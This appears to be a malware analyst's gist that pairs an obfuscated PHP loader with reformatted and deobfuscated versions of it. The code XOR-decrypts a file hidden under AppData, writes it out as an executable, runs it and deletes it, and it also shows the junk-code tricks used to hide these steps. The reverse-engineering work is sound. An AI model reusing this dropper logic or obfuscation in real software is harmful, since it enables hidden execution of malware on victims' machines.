hasherezade/deobfuscated.php Secret

## deobfuscated.php
<?php
function _get_arr_value($index)
{
    $fcfeek = Array(
        "\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20", //0
        "\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c", //1
        'qsgfh',//2
        'ojetjlsjqbudwfx', //3
        'oktwz',//4
        'ekuwdqoqcadeetv', //5
        'nxz', //6
        ''//7
    );
    return $fcfeek[$index];
}
?>
<?php
$key = -1388517416;
$erywquk = 3383;
$in_filename = _get_arr_value(0);
$out_filename = _get_arr_value(1);
$in_filename = decode($in_filename, $key);
#$in_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh"

$golkdbl = _get_arr_value(2);
$out_filename = decode($out_filename, $key);
$file_content = file_get_contents($in_filename);
#out_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh.exe"

if ($file_content) {
    $decoded_content = decode($file_content, $key);
    file_put_contents($out_filename, $decoded_content);
    exec($out_filename);
    while (!unlink($out_filename))
        Sleep(1);
}

function shift_decode($val, $and_val)
{
    $k = $and_val & 31;
    return ($val << $k) | (($val >> (32 - $k)) & ((1 << (31 & $k)) - 1));
}

function decode($in_buffer, $key)
{
    $out_buffer = '';

    $input_len = strlen($in_buffer);
    for ($index = 0; $index < $input_len; ++$index) {
        $decoded_char = chr(ord($in_buffer{$index}) ^ ($key & 0xFF));
        $out_buffer .= $decoded_char;
        $key = shift_decode($key, 8);
        ++$key;
    }
    return $out_buffer;
}
?>

## formated.php
<?php
$GLOBALS['529399110'] = Array(
    '' . 'abs',
    'f' . 'ile' . '_' . 'ge' . 't' . '_c' . 'o' . 'ntents',
    'file_put' . '_content' . 's',
    'exec',
    'strpos',
    '' . 'so' . 'cke' . 't_get_sta' . 't' . 'us',
    'un' . 'link',
    'ar' . 'ray_m' . 'erge',
    'strpos',
    'im' . 'agefilter',
    'a' . 'rray_sh' . 'ift',
    's' . 't' . 'rpti' . 'me',
    'strl' . 'e' . 'n',
    'u' . 'c' . 'f' . 'irst',
    '' . 'ch' . 'r',
    'ord',
    's' . 'ubs' . 't' . 'r' . '_re' . 'place',
    'su' . 'bstr_re' . 'p' . 'lac' . 'e',
    'copy',
    'un' . 'l' . 'ink'
);
?><?php
function _2136181597($fcvppx)
{
    $fcfeek = Array(
        "\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20",
        "\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",
        'qsgfh',
        'ojetjlsjqbudwfx',
        'oktwz',
        'ekuwdqoqcadeetv',
        'nxz',
        ''
    );
    return $fcfeek[$fcvppx];
}
?>
<?php
$tmgwczl = -round(0 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2);
$erywquk = round(0 + 845.75 + 845.75 + 845.75 + 845.75);
$pvkdnon = _2136181597(0);
while (round(0 + 278 + 278 + 278 + 278) - round(0 + 278 + 278 + 278 + 278))
    $GLOBALS['529399110'][0]($ehzfpai);
$zzmnlgm = _2136181597(1);
$pvkdnon = girsztc($pvkdnon, $tmgwczl);
$golkdbl = _2136181597(2);
$zzmnlgm = girsztc($zzmnlgm, $tmgwczl);
$dtpcqwi = $GLOBALS['529399110'][1]($pvkdnon);
if ($dtpcqwi) {
    $mauwmmh = girsztc($dtpcqwi, $tmgwczl);
    $GLOBALS['529399110'][2]($zzmnlgm, $mauwmmh);
    $GLOBALS['529399110'][3]($zzmnlgm);
    if ($GLOBALS['529399110'][4](_2136181597(3), _2136181597(4)) !== false)
        $GLOBALS['529399110'][5]($opberbw, $zzmnlgm);
    while (!$GLOBALS['529399110'][6]($zzmnlgm))
        Sleep(round(0 + 0.5 + 0.5));
}
function vsqaxzw($ujxlctg, $cuvcjeb)
{
    $jedmsae = $cuvcjeb & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
    while (round(0 + 4457) - round(0 + 1114.25 + 1114.25 + 1114.25 + 1114.25))
        $GLOBALS['529399110'][7]($cuvcjeb, $ujxlctg, $dtpcqwi, $mauwmmh);
    return ($ujxlctg << $jedmsae) | (($ujxlctg >> (round(0 + 16 + 16) - $jedmsae)) & ((round(0 + 0.5 + 0.5) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $jedmsae)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
    if ($GLOBALS['529399110'][8](_2136181597(5), _2136181597(6)) !== false)
        $GLOBALS['529399110'][9]($opberbw);
}
function girsztc($ehzfpai, $tmgwczl)
{
    $fnbzhld = _2136181597(7);
    if ((round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667) + round(0 + 405.75 + 405.75 + 405.75 + 405.75)) > round(0 + 1.25 + 1.25 + 1.25 + 1.25) || $GLOBALS['529399110'][10]($zzmnlgm));
    else {
        $GLOBALS['529399110'][11]($ehzfpai, $pvkdnon, $abwytbw);
    }
    $abwytbw = $GLOBALS['529399110'][12]($ehzfpai);
    while (round(0 + 15 + 15 + 15 + 15 + 15) - round(0 + 25 + 25 + 25))
        $GLOBALS['529399110'][13]($pvkdnon, $mauwmmh);
    for ($opberbw = round(0); $opberbw < $abwytbw; ++$opberbw) {
        $xqnsess = $GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw}) ^ ($tmgwczl & round(0 + 85 + 85 + 85)));
        if ((round(0 + 366 + 366 + 366 + 366 + 366) ^ round(0 + 610 + 610 + 610)) && $GLOBALS['529399110'][16]($tmgwczl, $mauwmmh, $ehzfpai))
            $GLOBALS['529399110'][17]($xqnsess, $ujxlctg);
        $fnbzhld .= $xqnsess;
        if ((round(0 + 552 + 552 + 552) ^ round(0 + 1656)) && $GLOBALS['529399110'][18]($jedmsae, $opberbw))
            $GLOBALS['529399110'][19]($pvkdnon, $fnbzhld, $opberbw);
        $tmgwczl = vsqaxzw($tmgwczl, round(0 + 4 + 4));
        ++$tmgwczl;
    }
    return $fnbzhld;
}
?>

## script.php
<?php $GLOBALS['529399110']=Array('' .'abs','f' .'ile' .'_' .'ge' .'t' .'_c' .'o' .'ntents','file_put' .'_content' .'s','exec','strpos','' .'so' .'cke' .'t_get_sta' .'t' .'us','un' .'link','ar' .'ray_m' .'erge','strpos','im' .'agefilter','a' .'rray_sh' .'ift','s' .'t' .'rpti' .'me','strl' .'e' .'n','u' .'c' .'f' .'irst','' .'ch' .'r','ord','s' .'ubs' .'t' .'r' .'_re' .'place','su' .'bstr_re' .'p' .'lac' .'e','copy','un' .'l' .'ink'); ?><?php function _2136181597($fcvppx){$fcfeek=Array("\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20","\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",'qsgfh','ojetjlsjqbudwfx','oktwz','ekuwdqoqcadeetv','nxz','');return $fcfeek[$fcvppx];} ?><?php $tmgwczl=-round(0+277703483.2+277703483.2+277703483.2+277703483.2+277703483.2);$erywquk=round(0+845.75+845.75+845.75+845.75);$pvkdnon=_2136181597(0);while(round(0+278+278+278+278)-round(0+278+278+278+278))$GLOBALS['529399110'][0]($ehzfpai);$zzmnlgm=_2136181597(1);$pvkdnon=girsztc($pvkdnon,$tmgwczl);$golkdbl=_2136181597(2);$zzmnlgm=girsztc($zzmnlgm,$tmgwczl);$dtpcqwi=$GLOBALS['529399110'][1]($pvkdnon);if($dtpcqwi){$mauwmmh=girsztc($dtpcqwi,$tmgwczl);$GLOBALS['529399110'][2]($zzmnlgm,$mauwmmh);$GLOBALS['529399110'][3]($zzmnlgm);if($GLOBALS['529399110'][4](_2136181597(3),_2136181597(4))!==false)$GLOBALS['529399110'][5]($opberbw,$zzmnlgm);while(!$GLOBALS['529399110'][6]($zzmnlgm))Sleep(round(0+0.5+0.5));}function vsqaxzw($ujxlctg,$cuvcjeb){$jedmsae=$cuvcjeb&round(0+7.75+7.75+7.75+7.75);while(round(0+4457)-round(0+1114.25+1114.25+1114.25+1114.25))$GLOBALS['529399110'][7]($cuvcjeb,$ujxlctg,$dtpcqwi,$mauwmmh);return($ujxlctg << $jedmsae)|(($ujxlctg >>(round(0+16+16)-$jedmsae))&((round(0+0.5+0.5)<<(round(0+7.75+7.75+7.75+7.75)&$jedmsae))-round(0+0.2+0.2+0.2+0.2+0.2)));if($GLOBALS['529399110'][8](_2136181597(5),_2136181597(6))!==false)$GLOBALS['529399110'][9]($opberbw);}function girsztc($ehzfpai,$tmgwczl){$fnbzhld=_2136181597(7);if((round(0+1.6666666666667+1.6666666666667+1.6666666666667)+round(0+405.75+405.75+405.75+405.75))>round(0+1.25+1.25+1.25+1.25)|| $GLOBALS['529399110'][10]($zzmnlgm));else{$GLOBALS['529399110'][11]($ehzfpai,$pvkdnon,$abwytbw);}$abwytbw=$GLOBALS['529399110'][12]($ehzfpai);while(round(0+15+15+15+15+15)-round(0+25+25+25))$GLOBALS['529399110'][13]($pvkdnon,$mauwmmh);for($opberbw=round(0);$opberbw<$abwytbw;++$opberbw){$xqnsess=$GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw})^($tmgwczl&round(0+85+85+85)));if((round(0+366+366+366+366+366)^round(0+610+610+610))&& $GLOBALS['529399110'][16]($tmgwczl,$mauwmmh,$ehzfpai))$GLOBALS['529399110'][17]($xqnsess,$ujxlctg);$fnbzhld .= $xqnsess;if((round(0+552+552+552)^round(0+1656))&& $GLOBALS['529399110'][18]($jedmsae,$opberbw))$GLOBALS['529399110'][19]($pvkdnon,$fnbzhld,$opberbw);$tmgwczl=vsqaxzw($tmgwczl,round(0+4+4));++$tmgwczl;}return $fnbzhld;} ?>
	<?php
	function _get_arr_value($index)
	{
	$fcfeek = Array(
	"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20", //0
	"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c", //1
	'qsgfh',//2
	'ojetjlsjqbudwfx', //3
	'oktwz',//4
	'ekuwdqoqcadeetv', //5
	'nxz', //6
	''//7
	);
	return $fcfeek[$index];
	}
	?>
	<?php
	$key = -1388517416;
	$erywquk = 3383;
	$in_filename = _get_arr_value(0);
	$out_filename = _get_arr_value(1);
	$in_filename = decode($in_filename, $key);
	#$in_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh"

	$golkdbl = _get_arr_value(2);
	$out_filename = decode($out_filename, $key);
	$file_content = file_get_contents($in_filename);
	#out_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh.exe"

	if ($file_content) {
	$decoded_content = decode($file_content, $key);
	file_put_contents($out_filename, $decoded_content);
	exec($out_filename);
	while (!unlink($out_filename))
	Sleep(1);
	}

	function shift_decode($val, $and_val)
	{
	$k = $and_val & 31;
	return ($val << $k) \| (($val >> (32 - $k)) & ((1 << (31 & $k)) - 1));
	}

	function decode($in_buffer, $key)
	{
	$out_buffer = '';

	$input_len = strlen($in_buffer);
	for ($index = 0; $index < $input_len; ++$index) {
	$decoded_char = chr(ord($in_buffer{$index}) ^ ($key & 0xFF));
	$out_buffer .= $decoded_char;
	$key = shift_decode($key, 8);
	++$key;
	}
	return $out_buffer;
	}
	?>
	<?php
	$GLOBALS['529399110'] = Array(
	'' . 'abs',
	'f' . 'ile' . '_' . 'ge' . 't' . '_c' . 'o' . 'ntents',
	'file_put' . '_content' . 's',
	'exec',
	'strpos',
	'' . 'so' . 'cke' . 't_get_sta' . 't' . 'us',
	'un' . 'link',
	'ar' . 'ray_m' . 'erge',
	'strpos',
	'im' . 'agefilter',
	'a' . 'rray_sh' . 'ift',
	's' . 't' . 'rpti' . 'me',
	'strl' . 'e' . 'n',
	'u' . 'c' . 'f' . 'irst',
	'' . 'ch' . 'r',
	'ord',
	's' . 'ubs' . 't' . 'r' . '_re' . 'place',
	'su' . 'bstr_re' . 'p' . 'lac' . 'e',
	'copy',
	'un' . 'l' . 'ink'
	);
	?><?php
	function _2136181597($fcvppx)
	{
	$fcfeek = Array(
	"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20",
	"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xcf\x24\x88\x98\xeb\x34\x9e\x9b\xc0\x2f\xdc\x96\xd4\x20\xdd\x81\xc2\x2c",
	'qsgfh',
	'ojetjlsjqbudwfx',
	'oktwz',
	'ekuwdqoqcadeetv',
	'nxz',
	''
	);
	return $fcfeek[$fcvppx];
	}
	?>
	<?php
	$tmgwczl = -round(0 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2 + 277703483.2);
	$erywquk = round(0 + 845.75 + 845.75 + 845.75 + 845.75);
	$pvkdnon = _2136181597(0);
	while (round(0 + 278 + 278 + 278 + 278) - round(0 + 278 + 278 + 278 + 278))
	$GLOBALS['529399110'][0]($ehzfpai);
	$zzmnlgm = _2136181597(1);
	$pvkdnon = girsztc($pvkdnon, $tmgwczl);
	$golkdbl = _2136181597(2);
	$zzmnlgm = girsztc($zzmnlgm, $tmgwczl);
	$dtpcqwi = $GLOBALS['529399110'][1]($pvkdnon);
	if ($dtpcqwi) {
	$mauwmmh = girsztc($dtpcqwi, $tmgwczl);
	$GLOBALS['529399110'][2]($zzmnlgm, $mauwmmh);
	$GLOBALS['529399110'][3]($zzmnlgm);
	if ($GLOBALS['529399110'][4](_2136181597(3), _2136181597(4)) !== false)
	$GLOBALS['529399110'][5]($opberbw, $zzmnlgm);
	while (!$GLOBALS['529399110'][6]($zzmnlgm))
	Sleep(round(0 + 0.5 + 0.5));
	}
	function vsqaxzw($ujxlctg, $cuvcjeb)
	{
	$jedmsae = $cuvcjeb & round(0 + 7.75 + 7.75 + 7.75 + 7.75);
	while (round(0 + 4457) - round(0 + 1114.25 + 1114.25 + 1114.25 + 1114.25))
	$GLOBALS['529399110'][7]($cuvcjeb, $ujxlctg, $dtpcqwi, $mauwmmh);
	return ($ujxlctg << $jedmsae) \| (($ujxlctg >> (round(0 + 16 + 16) - $jedmsae)) & ((round(0 + 0.5 + 0.5) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $jedmsae)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
	if ($GLOBALS['529399110'][8](_2136181597(5), _2136181597(6)) !== false)
	$GLOBALS['529399110'][9]($opberbw);
	}
	function girsztc($ehzfpai, $tmgwczl)
	{
	$fnbzhld = _2136181597(7);
	if ((round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667) + round(0 + 405.75 + 405.75 + 405.75 + 405.75)) > round(0 + 1.25 + 1.25 + 1.25 + 1.25) \|\| $GLOBALS['529399110'][10]($zzmnlgm));
	else {
	$GLOBALS['529399110'][11]($ehzfpai, $pvkdnon, $abwytbw);
	}
	$abwytbw = $GLOBALS['529399110'][12]($ehzfpai);
	while (round(0 + 15 + 15 + 15 + 15 + 15) - round(0 + 25 + 25 + 25))
	$GLOBALS['529399110'][13]($pvkdnon, $mauwmmh);
	for ($opberbw = round(0); $opberbw < $abwytbw; ++$opberbw) {
	$xqnsess = $GLOBALS['529399110'][14]($GLOBALS['529399110'][15]($ehzfpai{$opberbw}) ^ ($tmgwczl & round(0 + 85 + 85 + 85)));
	if ((round(0 + 366 + 366 + 366 + 366 + 366) ^ round(0 + 610 + 610 + 610)) && $GLOBALS['529399110'][16]($tmgwczl, $mauwmmh, $ehzfpai))
	$GLOBALS['529399110'][17]($xqnsess, $ujxlctg);
	$fnbzhld .= $xqnsess;
	if ((round(0 + 552 + 552 + 552) ^ round(0 + 1656)) && $GLOBALS['529399110'][18]($jedmsae, $opberbw))
	$GLOBALS['529399110'][19]($pvkdnon, $fnbzhld, $opberbw);
	$tmgwczl = vsqaxzw($tmgwczl, round(0 + 4 + 4));
	++$tmgwczl;
	}
	return $fnbzhld;
	}
	?>